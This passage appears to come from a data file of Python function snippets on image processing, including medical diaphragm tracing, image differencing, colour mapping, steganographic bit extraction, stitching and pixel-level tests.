len(lcolor_pts) == 0:\n diaphragmatic_lvl = np.zeros((256, 50, 3), np.uint8)\n\n cv2.imwrite('{}/{}/{}/{}'.format(\n DIR_2DST_Diaphragm, patient, plan, files[i]), diaphragmatic_lvl)\n\n # file = open(\n # '{}/{}/{}/points.txt'.format(DIR_2DST_Diaphragm, self.patient, self.plan), 'a')\n # file.write(\"{}:{}\\n\".format(files[i], []))\n # file.close()\n\n continue\n\n # Reverse the coordinates and store the result in lordered_pts list\n lordered_pts = []\n for j in range(len(lcolor_pts)):\n lordered_pts.append(lcolor_pts[j][::-1])\n\n \"\"\"\n Convert pixels coordinates into a tuples and check which column\n has pixels that corresponding to diaphragmatic level\n Obs. 
There are some columns that doesnt have any pixel that\n correpond to diaphragmatic level.\n \"\"\"\n # Columns that have a pixel corresponding diaphragmatic level\n lcolumn_available = []\n for j in range(len(lordered_pts)):\n lordered_pts[j] = tuple(lordered_pts[j])\n lcolumn_available.append(lordered_pts[j][0])\n lcolumn_available = list(set(lcolumn_available))\n # print(\"Ordered points: \", lordered_pts)\n # print(\"Columns available: \", lcolumn_available)\n\n \"\"\"\n If there is not enough columns to build a respiratory pattern,\n create a blank image\n \"\"\"\n if len(lcolumn_available) < 20:\n diaphragmatic_lvl = np.zeros((256, 50, 3), np.uint8)\n cv2.imwrite('{}/{}/{}/{}'.format(\n DIR_2DST_Diaphragm, patient, plan, files[i]), diaphragmatic_lvl)\n continue\n\n \"\"\"\n If there are no pixel that corresponding diaphragmatic level in the\n first column, assign to it the value of the second y coordinate\n \"\"\"\n if lcolumn_available[0] is not 0:\n y = max(\n [x for x in lordered_pts if x[0] == lcolumn_available[0]],\n key=itemgetter(1))[1]\n lordered_pts.insert(0, (0, y))\n lcolumn_available.insert(0, 0)\n\n \"\"\"\n If there are no pixel that corresponding diaphragmatic level in the\n last column, assign to it the value of the penultimate y coordinate\n available\n \"\"\"\n if lcolumn_available[-1] is not 49:\n lordered_pts.append(\n (49, lordered_pts[len(lcolumn_available)][1]))\n lcolumn_available.append(49)\n\n \"\"\"\n Get the biggest y value in each column that represents the\n diaphragmatic level\n \"\"\"\n column = 0\n lcolumn = []\n ldiaphragm_pts = []\n for j in range(50):\n # Get the column's points\n lcolumn = [x for x in lordered_pts if x[0] == column]\n # print('{}: {}'.format(j, lcolumn))\n\n if len(lcolumn) > 0:\n ldiaphragm_pts.append(\n max(lcolumn, key=itemgetter(1))) # Get the biggest y\n else:\n # Get the y value from the previous column\n lcolumn_available.insert(column, column)\n ldiaphragm_pts.append((column, ldiaphragm_pts[-1][1]))\n column += 1\n lcolumn = []\n\n # Draw diaphragmatic level\n diaphragmatic_lvl = np.zeros((256, 50, 3), np.uint8)\n j = 0\n while(j < len(lcolumn_available) - 1):\n cv2.line(\n diaphragmatic_lvl,\n ldiaphragm_pts[j], ldiaphragm_pts[j + 1],\n (0, 0, 255), 1)\n j = j + 1\n\n lcolumn_available = []\n\n print(\"Diaphragmatic's points: \", ldiaphragm_pts)\n cv2.imshow('Diaphragmatic level', diaphragmatic_lvl)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n cv2.imwrite('{}/{}/{}/{}'.format(\n DIR_2DST_Diaphragm, patient, plan, files[i]), diaphragmatic_lvl)\n\n # file = open('{}/{}/{}/points.txt'.format(DIR_2DST_Diaphragm, self.patient, self.plan), 'a')\n # file.write(\"{}:{}\\n\".format(files[i], ldiaphragm_pts))\n # file.close()\n\n # return ldiaphragm_pts", "def graph_maze_mismatch(filepaths, runs):\n plt.clf()\n denom = 15376.0 # the ouput matrix for an nxn net is size (2(n+2))^2\n for i in range(0,len(runs)):\n run = runs[i]\n plt.plot(run*(100.0/denom), linewidth = '1.0', label = filepaths[i])\n plt.title('Accuracy over time when features swapped')\n plt.xlabel('Test-Time iterations')\n plt.ylabel('Accuracy')\n plt.legend(loc=\"lower right\")\n plt.savefig(\"maze_mismatch.png\", dpi=500)", "def image_diff(image_a, image_b):\n histogram_diff = total_histogram_diff(pixel_diff(image_a, image_b))\n\n return histogram_diff", "def decode_image(file_location=\"images/encoded_sample.png\"):\n encoded_image = Image.open(file_location)\n\n x_size = encoded_image.size[0]\n y_size = encoded_image.size[1]\n\n decoded_image = Image.new(\"RGB\", 
encoded_image.size)\n pixels = decoded_image.load()\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(encoded_image, x, y):\n pixels[x, y] = (255,255,255)\n else:\n pixels[x, y] = (0, 0, 0)\n\n #pixels[x, y] = [(0,0,0) if lsb_of_pixel(red_channel, x, y) else (1,1,1)]\n\n decoded_image.save(\"images/decoded_image.png\")\n decoded_image.show()", "def greencalculator(input_map):\n #Convert the raster to an array\n image =Image.open(input_map)\n array = numpy.array(image)\n #Obtain number of elements in array \n lst = array.shape\n count = lst[0]*lst[1]\n #Divide array in quadrants\n quadrants = array[:(lst[0]/2), :(lst[1]/2)], array[(lst[0]/2):, :(lst[1]/2)], array[:(lst[0]/2), (lst[1]/2):], array[(lst[0]/2):, (lst[1]/2):]\n green_list = []\n #Calculate percentage of green per quadrant\n for i in quadrants:\n percentage = (100*float(numpy.sum(i)))/(count/4)\n green_list += [round(percentage, 3)]\n return green_list", "def blue_matrix(self):\n return np.vstack(np.where(self.np_image_matrix() == 2))", "def imageprepare():\r\n file_name = '9-test.png'\r\n im = Image.open(file_name).convert('L')\r\n\r\n im.save(\"9-t.png\")\r\n plt.imshow(im)\r\n plt.show()\r\n tv = list(im.getdata())\r\n\r\n # normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.\r\n tva = [(255 - x) * 1.0 / 255.0 for x in tv]\r\n return tva", "def get_identical_patches(imgs, patch_size):\n ih, iw = imgs[0].shape[:2]\n tp = patch_size\n ix = np.random.randint(0, iw - patch_size)\n iy = np.random.randint(0, ih - patch_size)\n imgs = []\n for i in range(len(imgs)):\n imgs.append(imgs[i][iy:iy + tp, ix:ix + tp, :])\n return imgs", "def _diff_images(img_before, img_after):\n width_before, height_before = img_before.size\n width_after, height_after = img_after.size\n data_before = img_before.getdata()\n data_after = img_after.getdata()\n\n width, height = max(width_before, width_after), max(height_before, height_after)\n offset_ax = (width - width_before) // 2\n offset_ay = (height - height_before) // 2\n offset_bx = (width - width_after) // 2\n offset_by = (height - height_after) // 2\n\n diff = 0\n for y in range(height):\n for x in range(width):\n ax, ay = x - offset_ax, y - offset_ay\n bx, by = x - offset_bx, y - offset_by\n if (ax < 0 or bx < 0 or ax >= width_before or bx >= width_after or\n ay < 0 or by < 0 or ay >= height_before or by >= height_after):\n diff += 1\n else:\n if data_before[ax + ay *width_before] != data_after[bx + by * width_after]:\n diff += 1\n try:\n return round(diff / float(width * height), 4)\n except ZeroDivisionError:\n return 0.0", "def __get_color_table(self):\n #Color: Green Yellow Orange Red Distance:\n return [[0.70, 0.15, 0.1, 0.05], # 0\n [0.17, 0.6, 0.17, 0.06], # 1\n [0.06, 0.17, 0.6, 0.17], # 2\n [0.05, 0.12, 0.23, 0.6], # 3\n [0.05, 0.1, 0.15, 0.8]] # >= 4 ", "def reduceImage(img,N,M,n,m):\n scaleN = int(n/(2*N))\n scaleM = int(m/(2*M))\n imgR = np.zeros((2*N+1,2*M+1))\n for i in range(2*N+1):\n for j in range(2*M+1):\n if img[i*scaleN+2,j*scaleM+2,3] != 255:\n imgR[i,j] = 0.\n else: \n imgR[i,j] = 1.\n return imgR", "def false_color_fast(img):\n # red LUT\n red = np.zeros(256, dtype=\"uint8\")\n red[0:43] = 255\n red[43:86] = np.arange(43, 0, -1) * (255.0 / 43.0)\n red[172:215] = np.arange(0, 43) * (255.0 / 43.0)\n red[214:] = 255\n # green LUT\n green = np.zeros(256, dtype=\"uint8\")\n green[0:43] = np.arange(43) * (255.0 / 43.0)\n green[43:129] = 255\n green[129:172] = np.arange(43, 0, -1) * (255.0 / 43.0)\n # blue LUT\n blue = np.zeros(256, 
dtype=\"uint8\")\n blue[86:129] = np.arange(43) * (255.0 / 43.0)\n blue[129:213] = 255\n blue[213:] = np.arange(43, 0, -1) * (255 / 43.0)\n\n m,n = img.shape\n img_fc = np.zeros((m, n, 3))\n\n img_fc_r = cv2.LUT(img, red)\n img_fc_g = cv2.LUT(img, green)\n img_fc_b = cv2.LUT(img, blue)\n img_fc = cv2.merge((img_fc_r, img_fc_g, img_fc_b))\n\n return img_fc", "def get_pixel_list(img):\n orig_shape = img.shape # Remember the original shape of the img.\n # Store the img as a x by z array (z being the length of the colour space)\n # Essentially just a list of pixels.\n\n if len(img.shape) == 3:\n img = img.reshape(img.shape[0] * img.shape[1], img.shape[2])\n elif len(img.shape) == 2:\n img = img.reshape(img.shape[0] * img.shape[1],)\n return orig_shape, img", "def get_lines_test_pattern(img_size=(2048, 2048), angles=(0, 45, 90, 135)):\n\n my, mx = img_size\n\n width = 1\n # line_center_sep = width + line_edge_sep\n line_center_sep = np.arange(13, 0, -1)\n line_edge_sep = line_center_sep - width\n\n line_pair_sep = 30\n\n n = np.sum(line_edge_sep) + len(line_center_sep) * 2 * width + (len(line_center_sep) - 1) * line_pair_sep\n\n gt = np.zeros((n, n))\n start = 0\n\n for ii in range(len(line_center_sep)):\n gt[:, start:start + width] = 1\n\n a = start + width + line_edge_sep[ii]\n gt[:, a:a + width] = 1\n\n start = a + width + line_pair_sep\n\n # pad image\n pxl = int(np.floor((mx - gt.shape[1]) / 2))\n pxr = int(mx - gt.shape[1] - pxl)\n\n pyu = int(np.floor((my - gt.shape[0]) / 2))\n pyd = int(my - gt.shape[0] - pyu)\n\n gtp = np.pad(gt, ((pyu, pyd), (pxl, pxr)), mode='constant')\n\n test_patterns = []\n for a in angles:\n img = Image.fromarray(gtp)\n test_patterns.append(np.asarray(img.rotate(a, expand=0)))\n\n test_patterns = np.asarray(test_patterns)\n\n return test_patterns, line_center_sep", "def visualise_points_on_rd(rd_matrix, path, points, range_res, doppler_res):\n rd_img = SignalVisualizer(rd_matrix).get_image\n for point in points:\n range_coord = (point[0] / range_res).astype(int)\n doppler_coord = (point[1] / doppler_res).astype(int)\n if point[1] < 0:\n doppler_coord += int(rd_matrix.shape[1]/2 - 1)\n else:\n doppler_coord += int(rd_matrix.shape[1]/2)\n rd_img[range_coord*4:(range_coord*4+4),\n doppler_coord*4:(doppler_coord*4+4)] = [0., 0., 0.]\n plt.imsave(path, rd_img)\n plt.close()", "def vizDifference(diff):\n return (((diff - diff.min()) / (diff.max() - diff.min())) * 255).astype(np.uint8)", "def stitch_images(images, margin=5, cols=5):\n n, w, h, = images.shape\n n_rows = max(1, int(math.ceil(n / cols)))\n n_cols = min(n, cols)\n\n out_w = n_cols * w + (n_cols - 1) * margin\n out_h = n_rows * h + (n_rows - 1) * margin\n stitched_images = np.zeros((out_h, out_w), dtype=images.dtype)\n\n for row in range(n_rows):\n for col in range(n_cols):\n img_idx = row * cols + col\n if img_idx >= n:\n break\n\n stitched_images[(h + margin) * row : (h + margin) * row + h,\n (w + margin) * col : (w + margin) * col + w] = images[img_idx]\n\n return stitched_images", "def equalize_color(img):\n imgeq = numpy.zeros_like(img, dtype='float')\n for i in xrange(img.shape[2]):\n imgeq[:,:,i] = exposure.equalize_hist(img[:,:,i])\n return imgeq", "def flow_error_image(flow_1, flow_2, mask_occ, mask_noc=None, log_colors=True):\n mask_noc = np.ones(mask_occ.shape) if mask_noc is None else mask_noc\n diff_sq = (flow_1 - flow_2) ** 2\n diff = np.sqrt(np.sum(diff_sq, axis=-1, keepdims=True))\n if log_colors:\n height, width, _ = flow_1.shape\n colormap = [\n [0, 0.0625, 49, 54, 149],\n [0.0625, 0.125, 
69, 117, 180],\n [0.125, 0.25, 116, 173, 209],\n [0.25, 0.5, 171, 217, 233],\n [0.5, 1, 224, 243, 248],\n [1, 2, 254, 224, 144],\n [2, 4, 253, 174, 97],\n [4, 8, 244, 109, 67],\n [8, 16, 215, 48, 39],\n [16, 1000000000.0, 165, 0, 38]]\n colormap = np.asarray(colormap, dtype=np.float32)\n colormap[:, 2:5] = colormap[:, 2:5] / 255\n mag = np.sqrt(np.sum(np.square(flow_2), axis=-1, keepdims=True))\n error = np.min(diff / 3, 20 * diff / mag)\n im = np.zeros([height, width, 3])\n for i in range(colormap.shape[0]):\n colors = colormap[i, :]\n cond = np.logical_and(np.greater_equal(error, colors[0]), np.less(error, colors[1]))\n im = np.where(np.tile(cond, [1, 1, 1, 3]), np.ones([height, width, 1]) * colors[2:5], im)\n\n im = np.where(np.tile(np.array(mask_noc, dtype=bool), [1, 1, 1, 3]), im, im * 0.5)\n im = im * mask_occ\n else:\n error = (np.min(diff, 5) / 5) * mask_occ\n im_r = error # errors in occluded areas will be red\n im_g = error * mask_noc\n im_b = error * mask_noc\n im = np.stack([im_r, im_g, im_b], axis=-1)\n return im", "def test_flip_vertical() -> None:\n original = create_image(3, 2)\n set_color(original, 0, 0, create_color(0, 0, 0))\n set_color(original, 1, 0, create_color(90, 90, 90))\n set_color(original, 2, 0, create_color(255, 255, 255))\n set_color(original, 0, 1, create_color(10, 10, 10))\n set_color(original, 1, 1, create_color(0, 0, 0))\n set_color(original, 2, 1, create_color(90, 90, 90))\n \n expected = create_image(3, 2)\n set_color(expected, 0, 0, create_color(10, 10, 10))\n set_color(expected, 1, 0, create_color(0, 0, 0))\n set_color(expected, 2, 0, create_color(90, 90, 90))\n set_color(expected, 0, 1, create_color(0, 0, 0))\n set_color(expected, 1, 1, create_color(90, 90, 90))\n set_color(expected, 2, 1, create_color(255, 255, 255))\n \n flipped_vertical = flip_vertical(original)\n \n for x, y, col in flipped_vertical: # tests each colour of each pixel of the filtered sample image and compares it to the expected image\n check_equal('Checking pixel @(' + str(x) + ', ' + str(y) + ')', col, get_color(expected, x, y))", "def fakingColors(pixel):\n\n return (\n pixel[0] * 0.598 - 0.1957 * pixel[1] - 0.038 * pixel[2],\n pixel[1] * 1.174 - pixel[0] * 0.1994 - pixel[2] * 0.076,\n pixel[2] * 0.228 - pixel[0] * 0.1495 - pixel[1] * 0.2935\n )", "def _stripe(self, start_pixel, num_pixels):\n cols = [] # list of lists of 1-pixel columns\n for n in range(num_pixels):\n cols.append(self._column(start_pixel + n))\n stripe = []\n avg = ()\n for pixels in zip(*cols):\n r = g = b = 0\n for p in pixels:\n r += p[0]\n g += p[1]\n b += p[2]\n col_count = len(pixels)\n avg = (float(r/col_count), float(g/col_count), \n float(b/col_count), 255)\n stripe.append(avg)\n return stripe", "def createdog(self,imagearr):\n re = [0,1,2,3]\n re[0] = self.diff(self.gs_blur(self.sigma,imagearr))\n for i in range(1,4):\n base = self.sampling(re[i-1][2])\n re[i] = self.diff(self.gs_blur(self.sigma, base))\n return re", "def pix2pix_results_to_frames(img_array):\n frames = []\n\n for i in range(int(len(img_array)/3)):\n\n try:\n left = cv2.resize(img_array[i * 3], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n right = cv2.resize(img_array[i * 3 + 2], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n\n scale = 512/img_array[i * 3 + 1].shape[0]\n middle = cv2.resize(img_array[i * 3 + 1], (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_NEAREST)\n\n frames.append(np.concatenate((left, middle, right), axis=1))\n\n frames.append(img_array[i * 3+1])\n except:\n print(\"Error\")\n\n return frames", 
"def filter_images(self, images):\n status = self.day_or_night(images[0][1],\n self.gray_refs['day'][0],\n self.gray_refs['night'][0])\n print status\n exclusions = self.gray_refs[status]\n threshold = 0.7\n last_ref = None\n result = []\n\n for filename, gray_img, raw_img in images:\n skip = False\n if last_ref:\n dist = ssim(gray_img, exclusions[last_ref], multichannel=False)\n if dist > threshold:\n skip = True\n\n if not skip:\n for i, gray_ref in enumerate(exclusions):\n if i == last_ref:\n continue\n dist = ssim(gray_img, gray_ref, multichannel=False)\n if dist > threshold:\n skip = True\n last_ref = i\n break\n\n if not skip:\n if (time.time() - self.last_notify) > notify_thresh:\n send_alert('Alert! Motion detected near front door.')\n self.last_notify = time.time()\n result.append((filename, gray_img, raw_img))\n return result", "def find_tfl_lights(image: np.ndarray):\n kernel = np.array(\n [[0, 0, 0],\n [0, 0, 0],\n [0, 1, 0],\n [1, 3, 1],\n [0, 1, 0]])\n\n kernel = kernel - kernel.mean()\n\n red_image = image.copy()\n red_image = red_image[:, :, 0]\n _, red_image = cv2.threshold(red_image, 200, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(red_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n red_points = np.where(mask)\n positions = []\n final_red_points = []\n for point1 in range(len(red_points[0])):\n point = (red_points[0][point1], red_points[1][point1])\n pixel = image[point[0], point[1]]\n if (pixel[1] < 170 or pixel[2] < 120) and pixel[0] >= 200:\n final_red_points.append(point)\n final_red_points = filter_points(final_red_points)\n positions += final_red_points\n auxilary = ['r'] * len(positions)\n red_x = [val[1] for val in final_red_points]\n red_y = [val[0] for val in final_red_points]\n green_image = image.copy()\n green_image = green_image[:, :, 1]\n _, green_image = cv2.threshold(green_image, 190, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(green_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n green_points = np.where(mask)\n final_green_points = []\n for point1 in range(len(green_points[0])):\n point = (green_points[0][point1], green_points[1][point1])\n pixel = image[point[0], point[1]]\n if pixel[0] <= 180 and pixel[1] >= 220 and pixel[2] >= 160:\n final_green_points.append(point)\n\n final_green_points = filter_points(final_green_points)\n positions += final_green_points\n auxilary += ['g'] * len(final_green_points)\n green_x = [val[1] for val in final_green_points]\n green_y = [val[0] for val in final_green_points]\n print(f\"There are {len(green_x) + len(red_x)} points\")\n return positions, auxilary", "def grey_to_rgb_imitation(img):\n return np.repeat(img[...,np.newaxis], 3, -1)", "def make_diff(file_before, file_after, file_output_name):\n if os.path.exists(file_output_name):\n shutil.rmtree(file_output_name)\n os.mkdir(file_output_name)\n psd_diff = diff(file_before, file_after)\n diff_content = {}\n for attr in [\"header\", \"layer\"]:\n diff_content[attr] = getattr(psd_diff, attr)\n with open(os.path.join(file_output_name, \"diff.json\"), \"w\") as diff_file:\n json.dump(diff_content, diff_file, indent=4)\n saved_files = []\n for layer_id in psd_diff.layer.keys():\n if len(psd_diff.layer_image[layer_id]) > 1:\n output_image = os.path.join(file_output_name, layer_id)\n 
psd_diff.layer_image[layer_id][\"before\"].save(output_image + \".before.png\")\n psd_diff.layer_image[layer_id][\"after\"].save(output_image + \".after.png\")\n diff_image_before = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"before\"].size)\n diff_image_before_data = diff_image_before.load()\n diff_image_after = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"after\"].size)\n diff_image_after_data = diff_image_after.load()\n width, height = diff_image_before.size\n pixel_index = 1\n for y in xrange(height):\n for x in xrange(width):\n if str(pixel_index) in diff_content[\"layer\"][layer_id][\"pixel\"]:\n diff_image_before_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"before\"])\n diff_image_after_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"after\"])\n else:\n diff_image_before_data[x, y] = (0, 0, 0, 0)\n diff_image_after_data[x, y] = (0, 0, 0, 0)\n pixel_index += 1\n diff_image_before.save(output_image + \".before.diff.png\", \"PNG\")\n diff_image_after.save(output_image + \".after.diff.png\", \"PNG\")\n saved_files.append(output_image + \".before.png\")\n saved_files.append(output_image + \".before.diff.png\")\n saved_files.append(output_image + \".after.diff.png\")\n saved_files.append(output_image + \".after.png\")\n saved_files.append(file_output_name + \"/diff.json\")\n return saved_files", "def create_uniform_image(height, width, pixel):\n pixels = []\n\n for r in range(height):\n row = [pixel] * width\n pixels += [row]\n\n return pixels", "def _correct_images(images):\n # From the MNIST website: \"Pixels are organized row-wise. Pixel values are 0 to 255. 0 means\n # background (white), 255 means foreground (black).\"\n # The dataset does not transform the image such that 255 is black, so do that here.\n dtype = _assert_dtype(images)\n max_val = 255 if dtype == dtypes.uint8 else 1.0\n return max_val - images", "def diffImages(imgA, imgB):\n bandsImgA = imgA.split()\n bandsImgB = imgB.split()\n\n absDiff = ImageMath.eval(\"convert(abs(a0-b0) + abs(a1-b1) + abs(a2-b2), 'L')\",\n a0 = bandsImgA[0], b0 = bandsImgB[0],\n a1 = bandsImgA[1], b1 = bandsImgB[1],\n a2 = bandsImgA[2], b2 = bandsImgB[2])\n bandsImgOut = [\n ImageMath.eval(\"convert(a + 2*diff, 'L')\", a = bandsImgA[0], diff = absDiff),\n ImageMath.eval(\"convert(a - diff, 'L')\", a = bandsImgA[1], diff = absDiff),\n ImageMath.eval(\"convert(a - diff, 'L')\", a = bandsImgA[2], diff = absDiff),\n ]\n\n return Image.merge('RGB', bandsImgOut)", "def refill_real(img, result, clustermask, cluster_colors):\n overall_dist = 0\n w, h, _ = img.shape\n for x in range(w):\n for y in range(h):\n cid = clustermask[x, y]\n result[x, y] = cluster_colors[cid]", "def stitch_images(images, margin=5, cols=5):\n if len(images) == 0:\n return None\n\n h, w, c = images[0].shape\n n_rows = int(math.ceil(len(images) / cols))\n n_cols = min(len(images), cols)\n\n out_w = n_cols * w + (n_cols - 1) * margin\n out_h = n_rows * h + (n_rows - 1) * margin\n stitched_images = np.zeros((out_h, out_w, c), dtype=images[0].dtype)\n\n for row in range(n_rows):\n for col in range(n_cols):\n img_idx = row * cols + col\n if img_idx >= len(images):\n break\n\n stitched_images[(h + margin) * row : (h + margin) * row + h,\n (w + margin) * col : (w + margin) * col + w, :] = images[img_idx]\n\n return stitched_images", "def generate_colour_data(width, height, imagiry_data, pixel2coord):\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append(\n [\n 
pixel2coord(j, i)[0],\n pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1],\n \n ]\n )", "def tabulate(image_path):\n img = cv.imread(image_path, cv.IMREAD_ANYDEPTH)\n unique, counts = np.unique(img, return_counts=True)\n dummy = [print(a[0], a[1]) for a in zip(unique, counts)]", "def assemble_matrix_images(self, matrix: pd.DataFrame) -> pd.DataFrame:\n img_matrix = matrix.copy(deep=True)\n for row in range(len(matrix)):\n for col in range(len(matrix.iloc[0])):\n if matrix.iloc[row,col]:\n response = requests.get(matrix.iloc[row,col])\n img_matrix.iloc[row,col] = Image.open(BytesIO(response.content))\n\n # producing image\n vertical = []\n for row in range(len(img_matrix)):\n hstack_list = []\n for item in img_matrix.iloc[row]:\n if item:\n hstack_list += [(np.array(item.convert(\"RGB\")))]\n else:\n hstack_list += [np.zeros((512,512,3), dtype= np.uint8)]\n horizontal_combs = np.hstack(hstack_list)\n vertical += [horizontal_combs]\n imgs_comb = np.vstack(vertical)\n imgs_comb = Image.fromarray( imgs_comb)\n imgs_comb.show()\n return img_matrix", "def phantom_rectangles(n_points,R):\n \n \n #Rescaling according to image size \n R[:,0] = R[:,0]*n_points/2\n R[:,1] = R[:,1]*n_points/2\n R[:,2] = R[:,2]*n_points/2\n R[:,3] = R[:,3]*n_points/2\n R[:,4] = R[:,4]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 )\n nrow,ncol = R.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow))\n\n for k in range(nrow): #itero sui rettangoli\n x_new = x - R[k,0]\n y_new = y - R[k,1]\n\n u = abs(x_new*math.cos(R[k,4])+y_new*math.sin(R[k,4]))\n v = abs(-x_new*math.sin(R[k,4])+y_new*math.cos(R[k,4]))\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (u[i,j] < R[k,2]/2 and v[i,j] < R[k,3]/2):\n phantom1[i,j,k] = R[k,5]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def calculate_difference_image(img1, img2, tofloat=True):\n diff = img2 - img1\n if len(diff.shape) == 2:\n diff = diff.reshape((diff.shape[0], diff.shape[1], 1))\n channels = diff.shape[-1]\n\n newmax = 1 if tofloat else 255\n newmin = 0\n out = np.zeros(diff.shape)\n oldmin = diff.reshape(-1,channels).min(axis=0)\n oldmax = diff.reshape(-1,channels).max(axis=0)\n\n for dim in range(channels):\n pxs = diff[:,:,dim]\n oldmin = pxs.min()\n oldmax = pxs.max()\n out[:,:,dim] = (pxs - oldmin) * (newmax - newmin) / (oldmax - oldmin) + newmin\n\n if channels == 1:\n out = out.squeeze()\n\n return out", "def reveal_RGB_image(filename):\n\tnew_array = [[], [], []]\n\tim = Image.open(filename)\n\tpixels = convert_image_to_pixels(filename) # get RGB array\n\tfor pixel in pixels: # get tuple of RGB\n\t\tfor x in range(3): # get R, G, B lists\n\t\t\tnew_array[x].append(85 * (pixel[x] & 3)) # change 0-3 to 0-255\n\t\t# get hidden 2 least significant bits\n\tfinal_array = list(zip(new_array[0], new_array[1], new_array[2]))\n\t# create a new image container in RGB mode,\n\t# and import array pixels data into the container\n\treturn convert_pixels_to_image(final_array, im.size)", "def gdtshow(X, N=10):\n from numpy import newaxis, ravel, ceil, zeros, ones, transpose, repeat, concatenate, arange, reshape, floor\n\n def apply_lut(img, lut):\n def lut_map(intens, lut=lut): return lut[intens]\n g = reshape(transpose(map(lut_map, ravel(img))), (3,img.shape[0],img.shape[1]))\n return g\n np = 1 # number of pixels by isoline\n if len(X.shape) == 1: X = 
X[newaxis,:]\n maxi, mini = X.max(), X.min()\n d = int(ceil(256./N))\n m = zeros(256)\n m[0:256:d] = 1\n m = transpose([m,m,m])\n # lut gray\n gray = floor(arange(N)*255. // (N-1) + 0.5).astype('B')\n gray = repeat(gray, d)[0:256]\n gray = transpose([gray,gray,gray])\n # lut jet\n r = concatenate((range(126,0,-4),zeros(64),range(0,255,4),255*ones(64),range(255,128,-4)))\n g = concatenate((zeros(32),range(0,255,4),255*ones(64),range(255,0,-4),zeros(32)))\n b = 255 - r\n jet = transpose([r,g,b])\n # apply lut\n XX = floor((X-mini)*255. // maxi + 0.5).astype('B')\n lut = (1-m)*gray + m*jet\n Y = apply_lut(XX, lut)\n return Y", "def combine_test():\n\n red = create_image(1, 3, create_color(255, 0, 0))\n green = create_image(1, 3, create_color(0, 255, 0))\n blue = create_image(1, 3, create_color(0, 0, 255))\n\n expected = create_image(1, 3, create_color(255, 255, 255))\n\n result = combine(red, green, blue)\n\n for x, y, (r, g, b) in result:\n if (r, g, b) == tuple(get_color(expected, x, y)):\n print(\"Pixel at (\" + str(x) + \",\" + str(y) + \") passed.\")\n else:\n print(\"Pixel at (\" + str(x) + \",\" + str(y) + \") failed. Expected \" + str((r, g, b)) + \" got \"\n + str(get_color(expected, x, y)))", "def img2line(img):\n img = img_as_bool(img)\n Ns = sum(img, axis=1)\n N = sum(Ns)\n\n ni, nj = img.shape\n jrange = np.arange(nj)\n\n iseq = np.zeros(N, dtype=int)\n jseq = np.zeros(N, dtype=int)\n\n ii = iseq\n jj = jseq\n for i, n in enumerate(Ns):\n ii, ii[:n] = ii[:n], i\n jj, jj[:n] = jj[:n], jrange[img[i, :] == 1]\n\n assert not ii\n assert not jj\n\n return iseq, jseq", "def generate_image(row):\n image = np.zeros((960, 1280, 4), np.uint8) \n image[:,:] = (128, 128, 128, 255)\n x = int(row['currXcorrected'])\n y = int(row['currYcorrected']) \n path = \"/net/store/nbp/projects/fixdur/stimuli/single_bubble_images/\" + \\\n str(row.loc['image']) + \"/\" + \\\n \"bubble_\" + str(x) + \"_\" + str(y) + \".tiff\"\n bubble = prepare_bubble(path) \n image[y:y+154, x:x+154] = bubble\n\n return image", "def reconstruct_from_grayscale_patches( patches, origin, epsilon=1e-12 ):\n patch_width = patches.shape[2]\n patch_height = patches.shape[1]\n img_width = np.max( origin[1] ) + patch_width\n img_height = np.max( origin[0] ) + patch_height\n\n out = np.zeros( (img_height,img_width) )\n wgt = np.zeros( (img_height,img_width) )\n for i in range(patch_height):\n for j in range(patch_width):\n out[origin[0]+i,origin[1]+j] += patches[:,i,j]\n wgt[origin[0]+i,origin[1]+j] += 1.0\n\n return out/np.maximum( wgt, epsilon ), wgt", "def joinImages(imgs):\n d = imgs.shape[0]\n h, w = imgs.shape[1], imgs.shape[2]\n colour = imgs.shape[3]\n img = np.zeros((h, w * d, colour))\n for idx, image in enumerate(imgs):\n i = idx\n img[0:h, i * w:i * w + w, :] = image\n return ((img * 255.) 
+ 1) * 2", "def colour_image(self):\n for row_cnt, colour_row in enumerate(self.table_colour):\n self.processed = []\n for column_cnt, colour in enumerate(colour_row):\n self.row_cnt = row_cnt + 3\n self.column_cnt = column_cnt\n self.colour = colour\n self.word = self.original_rows[self.row_cnt - 3][self.column_cnt]\n self.colour_specific_word()", "def mirror(img):\n return img[:, ::-1]", "def check_border(pool, func, images, entries, copy_failed):\n start = time.perf_counter()\n test_results = pool.map(func, images)\n logger.info(\"%i of %i images have white border.\",\n test_results.count(True), len(test_results))\n failed = []\n # Iterate in reverse to avoid shifting\n # the indices of the objects we want to remove\n for i, passed in reversed(list(enumerate(test_results))):\n if not passed:\n del images[i]\n failed.append(entries.pop(i))\n if failed:\n # Log the names in their original order\n failed = list(reversed(failed))\n logger.info(\"Skipping %i images:\", len(failed))\n util.pprint_log([x.name for x in failed], logger.info)\n if copy_failed:\n _copy_failed(failed)\n logger.info(util.elapsed(start))\n logger.info(\"\\n\")" ]
